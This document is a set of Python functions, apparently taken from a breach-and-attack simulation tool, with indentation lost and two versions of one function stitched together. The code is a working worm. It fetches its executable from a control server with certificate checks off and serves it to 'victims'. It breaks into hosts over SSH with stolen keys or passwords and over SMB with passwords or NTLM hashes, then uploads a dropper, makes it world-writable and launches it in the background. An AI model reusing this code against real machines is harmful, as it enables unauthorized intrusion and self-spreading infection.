def download_monkey_exe_by_filename(filename, size):
if not WormConfiguration.current_server:
return None
try:
dest_file = monkeyfs.virtual_path(filename)
if (monkeyfs.isfile(dest_file)) and (
size == monkeyfs.getsize(dest_file)):
return dest_file
else:
download = requests.get(
"https://%s/api/monkey/download/%s" % # noqa: DUO123
(WormConfiguration.current_server, filename),
verify=False,
proxies=ControlClient.proxies)
with monkeyfs.open(dest_file, 'wb') as file_obj:
for chunk in download.iter_content(
chunk_size=DOWNLOAD_CHUNK):
if chunk:
file_obj.write(chunk)
file_obj.flush()
if size == monkeyfs.getsize(dest_file):
return dest_file
except Exception as exc:
LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc)
def send_head(self):
if self.path != "/" + urllib.parse.quote(
os.path.basename(self.filename)):
self.send_error(500, "")
return None, 0, 0
try:
f = monkeyfs.open(self.filename, "rb")
except IOError:
self.send_error(404, "File not found")
return None, 0, 0
size = monkeyfs.getsize(self.filename)
start_range = 0
end_range = size
if "Range" in self.headers:
s, e = self.headers["range"][6:].split("-", 1)
sl = len(s)
el = len(e)
if sl > 0:
start_range = int(s)
if el > 0:
end_range = int(e) + 1
elif el > 0:
ei = int(e)
if ei < size:
start_range = size - ei
if start_range == 0 and end_range - start_range >= size:
self.send_response(200)
else:
self.send_response(206)
else:
self.send_response(200)
self.send_header("Content-type", "application/octet-stream")
self.send_header(
"Content-Range",
"bytes " + str(start_range) + "-" + str(end_range - 1) + "/" +
str(size),
)
self.send_header("Content-Length", min(end_range - start_range, size))
self.end_headers()
return f, start_range, end_range
def do_GET(self):
"""Serve a GET request."""
f, start_range, end_range = self.send_head()
if f:
f.seek(start_range, 0)
chunk = 0x1000
total = 0
while chunk > 0:
if start_range + chunk > end_range:
chunk = end_range - start_range
try:
self.wfile.write(f.read(chunk))
except:
break
total += chunk
start_range += chunk
if f.tell() == monkeyfs.getsize(self.filename):
self.report_download(self.client_address)
f.close()
def _exploit_host(self):
port = SSH_PORT
# if ssh banner found on different port, use that port.
for servkey, servdata in list(self.host.services.items()):
if servdata.get("name") == "ssh" and servkey.startswith("tcp-"):
port = int(servkey.replace("tcp-", ""))
is_open, _ = check_tcp_port(self.host.ip_addr, port)
if not is_open:
logger.info("SSH port is closed on %r, skipping", self.host)
return False
try:
ssh = self.exploit_with_ssh_keys(port)
except FailedExploitationError:
try:
ssh = self.exploit_with_login_creds(port)
except FailedExploitationError:
logger.debug("Exploiter SSHExploiter is giving up...")
return False
if not self.host.os.get("type"):
try:
_, stdout, _ = ssh.exec_command("uname -o")
uname_os = stdout.read().lower().strip().decode()
if "linux" in uname_os:
self.host.os["type"] = "linux"
else:
logger.info("SSH Skipping unknown os: %s", uname_os)
return False
except Exception as exc:
logger.debug("Error running uname os command on victim %r: (%s)", self.host, exc)
return False
if not self.host.os.get("machine"):
try:
_, stdout, _ = ssh.exec_command("uname -m")
uname_machine = stdout.read().lower().strip().decode()
if "" != uname_machine:
self.host.os["machine"] = uname_machine
except Exception as exc:
logger.debug(
"Error running uname machine command on victim %r: (%s)", self.host, exc
)
if self.skip_exist:
_, stdout, stderr = ssh.exec_command(
"head -c 1 %s" % self._config.dropper_target_path_linux
)
stdout_res = stdout.read().strip()
if stdout_res:
# file exists
logger.info(
"Host %s was already infected under the current configuration, "
"done" % self.host
)
return True # return already infected
src_path = get_target_monkey(self.host)
if not src_path:
logger.info("Can't find suitable monkey executable for host %r", self.host)
return False
try:
ftp = ssh.open_sftp()
self._update_timestamp = time.time()
with monkeyfs.open(src_path) as file_obj:
ftp.putfo(
file_obj,
self._config.dropper_target_path_linux,
file_size=monkeyfs.getsize(src_path),
callback=self.log_transfer,
)
ftp.chmod(self._config.dropper_target_path_linux, 0o777)
status = ScanStatus.USED
T1222Telem(
ScanStatus.USED,
"chmod 0777 %s" % self._config.dropper_target_path_linux,
self.host,
).send()
ftp.close()
except Exception as exc:
logger.debug("Error uploading file into victim %r: (%s)", self.host, exc)
status = ScanStatus.SCANNED
T1105Telem(
status, get_interface_to_target(self.host.ip_addr), self.host.ip_addr, src_path
).send()
if status == ScanStatus.SCANNED:
return False
try:
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
cmdline += build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=SSH_PORT
)
cmdline += " > /dev/null 2>&1 &"
ssh.exec_command(cmdline)
logger.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux,
self.host,
cmdline,
)
ssh.close()
self.add_executed_cmd(cmdline)
return True
except Exception as exc:
logger.debug("Error running monkey on victim %r: (%s)", self.host, exc)
return False
def copy_file(host,
src_path,
dst_path,
username,
password,
lm_hash='',
ntlm_hash='',
timeout=60):
assert monkeyfs.isfile(
src_path), "Source file to copy (%s) is missing" % (src_path, )
config = infection_monkey.config.WormConfiguration
src_file_size = monkeyfs.getsize(src_path)
smb, dialect = SmbTools.new_smb_connection(host, username, password,
lm_hash, ntlm_hash, timeout)
if not smb:
return None
# skip guest users
if smb.isGuestSession() > 0:
LOG.debug(
"Connection to %r granted guest privileges with user: %s, password (SHA-512): '%s',"
" LM hash (SHA-512): %s, NTLM hash (SHA-512): %s", host,
username, Configuration.hash_sensitive_data(password),
Configuration.hash_sensitive_data(lm_hash),
Configuration.hash_sensitive_data(ntlm_hash))
try:
smb.logoff()
except:
pass
return None
try:
resp = SmbTools.execute_rpc_call(smb, "hNetrServerGetInfo", 102)
except Exception as exc:
LOG.debug("Error requesting server info from %r over SMB: %s",
host, exc)
return None
info = {
'major_version':
resp['InfoStruct']['ServerInfo102']['sv102_version_major'],
'minor_version':
resp['InfoStruct']['ServerInfo102']['sv102_version_minor'],
'server_name':
resp['InfoStruct']['ServerInfo102']['sv102_name'].strip("\0 "),
'server_comment':
resp['InfoStruct']['ServerInfo102']['sv102_comment'].strip("\0 "),
'server_user_path':
resp['InfoStruct']['ServerInfo102']['sv102_userpath'].strip("\0 "),
'simultaneous_users':
resp['InfoStruct']['ServerInfo102']['sv102_users']
}
LOG.debug("Connected to %r using %s:\n%s", host, dialect,
pprint.pformat(info))
try:
resp = SmbTools.execute_rpc_call(smb, "hNetrShareEnum", 2)
except Exception as exc:
LOG.debug("Error enumerating server shares from %r over SMB: %s",
host, exc)
return None
resp = resp['InfoStruct']['ShareInfo']['Level2']['Buffer']
high_priority_shares = ()
low_priority_shares = ()
file_name = ntpath.split(dst_path)[-1]
for i in range(len(resp)):
share_name = resp[i]['shi2_netname'].strip("\0 ")
share_path = resp[i]['shi2_path'].strip("\0 ")
current_uses = resp[i]['shi2_current_uses']
max_uses = resp[i]['shi2_max_uses']
if current_uses >= max_uses:
LOG.debug(
"Skipping share '%s' on victim %r because max uses is exceeded",
share_name, host)
continue
elif not share_path:
LOG.debug(
"Skipping share '%s' on victim %r because share path is invalid",
share_name, host)
continue
share_info = {'share_name': share_name, 'share_path': share_path}
if dst_path.lower().startswith(share_path.lower()):
high_priority_shares += ((ntpath.sep +
dst_path[len(share_path):],
share_info), )
low_priority_shares += ((ntpath.sep + file_name, share_info), )
shares = high_priority_shares + low_priority_shares
file_uploaded = False
for remote_path, share in shares:
share_name = share['share_name']
share_path = share['share_path']
if not smb:
smb, _ = SmbTools.new_smb_connection(host, username, password,
lm_hash, ntlm_hash,
timeout)
if not smb:
return None
try:
tid = smb.connectTree(share_name)
except Exception as exc:
LOG.debug(
"Error connecting tree to share '%s' on victim %r: %s",
share_name, host, exc)
continue
LOG.debug(
"Trying to copy monkey file to share '%s' [%s + %s] on victim %r",
share_name,
share_path,
remote_path,
host.ip_addr[0],
)
remote_full_path = ntpath.join(share_path,
remote_path.strip(ntpath.sep))
# check if file is found on destination
if config.skip_exploit_if_file_exist:
try:
file_info = smb.listPath(share_name, remote_path)
if file_info:
if src_file_size == file_info[0].get_filesize():
LOG.debug(
"Remote monkey file is same as source, skipping copy"
)
return remote_full_path
LOG.debug(
"Remote monkey file is found but different, moving along with attack"
)
except:
pass # file isn't found on remote victim, moving on
try:
with monkeyfs.open(src_path, 'rb') as source_file:
# make sure of the timeout
smb.setTimeout(timeout)
smb.putFile(share_name, remote_path, source_file.read)
file_uploaded = True
T1105Telem(ScanStatus.USED,
get_interface_to_target(host.ip_addr), host.ip_addr,
dst_path).send()
LOG.info(
"Copied monkey file '%s' to remote share '%s' [%s] on victim %r",
src_path, share_name, share_path, host)
break
except Exception as exc:
LOG.debug(
"Error uploading monkey to share '%s' on victim %r: %s",
share_name, host, exc)
T1105Telem(ScanStatus.SCANNED,
get_interface_to_target(host.ip_addr), host.ip_addr,
dst_path).send()
continue
finally:
try:
smb.logoff()
except:
pass
smb = None
if not file_uploaded:
LOG.debug(
"Couldn't find a writable share for exploiting victim %r with "
"username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
host, username, Configuration.hash_sensitive_data(password),
Configuration.hash_sensitive_data(lm_hash),
Configuration.hash_sensitive_data(ntlm_hash))
return None
return remote_full_path
def _exploit_host(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
port = SSH_PORT
# if ssh banner found on different port, use that port.
for servkey, servdata in self.host.services.items():
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
port = int(servkey.replace('tcp-', ''))
is_open, _ = check_tcp_port(self.host.ip_addr, port)
if not is_open:
LOG.info("SSH port is closed on %r, skipping", self.host)
return False
# Check for possible ssh exploits
exploited = self.exploit_with_ssh_keys(port, ssh)
if not exploited:
exploited = self.exploit_with_login_creds(port, ssh)
if not exploited:
LOG.debug("Exploiter SSHExploiter is giving up...")
return False
if not self.host.os.get('type'):
try:
_, stdout, _ = ssh.exec_command('uname -o')
uname_os = stdout.read().lower().strip()
if 'linux' in uname_os:
self.host.os['type'] = 'linux'
else:
LOG.info("SSH Skipping unknown os: %s", uname_os)
return False
except Exception as exc:
LOG.debug("Error running uname os commad on victim %r: (%s)",
self.host, exc)
return False
if not self.host.os.get('machine'):
try:
_, stdout, _ = ssh.exec_command('uname -m')
uname_machine = stdout.read().lower().strip()
if '' != uname_machine:
self.host.os['machine'] = uname_machine
except Exception as exc:
LOG.debug(
"Error running uname machine commad on victim %r: (%s)",
self.host, exc)
if self.skip_exist:
_, stdout, stderr = ssh.exec_command(
"head -c 1 %s" % self._config.dropper_target_path_linux)
stdout_res = stdout.read().strip()
if stdout_res:
# file exists
LOG.info(
"Host %s was already infected under the current configuration, done"
% self.host)
return True # return already infected
src_path = get_target_monkey(self.host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r",
self.host)
return False
try:
ftp = ssh.open_sftp()
self._update_timestamp = time.time()
with monkeyfs.open(src_path) as file_obj:
ftp.putfo(file_obj,
self._config.dropper_target_path_linux,
file_size=monkeyfs.getsize(src_path),
callback=self.log_transfer)
ftp.chmod(self._config.dropper_target_path_linux, 0o777)
status = ScanStatus.USED
T1222Telem(
ScanStatus.USED,
"chmod 0777 %s" % self._config.dropper_target_path_linux,
self.host).send()
ftp.close()
except Exception as exc:
LOG.debug("Error uploading file into victim %r: (%s)", self.host,
exc)
status = ScanStatus.SCANNED
T1105Telem(status, get_interface_to_target(self.host.ip_addr),
self.host.ip_addr, src_path).send()
if status == ScanStatus.SCANNED:
return False
try:
cmdline = "%s %s" % (self._config.dropper_target_path_linux,
MONKEY_ARG)
cmdline += build_monkey_commandline(self.host,
get_monkey_depth() - 1)
cmdline += "&"
ssh.exec_command(cmdline)
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux, self.host,
cmdline)
ssh.close()
self.add_executed_cmd(cmdline)
return True
except Exception as exc:
LOG.debug("Error running monkey on victim %r: (%s)", self.host,
exc)
return False
